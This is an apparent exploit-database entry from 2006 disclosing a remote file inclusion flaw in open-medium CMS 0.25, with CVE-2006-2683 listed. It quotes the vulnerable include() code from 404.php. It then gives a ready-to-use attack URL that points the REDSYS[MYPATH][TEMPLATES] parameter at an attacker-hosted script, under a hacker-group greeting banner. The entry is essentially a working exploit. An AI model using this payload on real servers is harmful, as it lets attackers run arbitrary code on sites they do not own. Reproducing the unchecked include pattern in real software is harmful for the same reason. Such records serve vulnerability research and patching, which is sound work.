open-medium.CMS 0.25 - '404.php' Remote File Inclusion

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2006-05-24 
date_updated:  
verified: 1 
codes: OSVDB-25832;CVE-2006-2683 
tags: 
aliases:  
screenshot_url:  
application_url: 

################ DEVIL TEAM THE BEST POLISH TEAM #################
#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities
#Find by Kacper (Rahim).
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
#Contact: kacper1964@yahoo.pl   or   http://www.devilteam.yum.pl
##################################################################
[code]
404.php:

.......

} else {
// templates verwenden
if
(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
{
include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
}
}

?>

[/code]
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]


###################################################################
#Elo ;-)

# milw0rm.com [2006-05-25]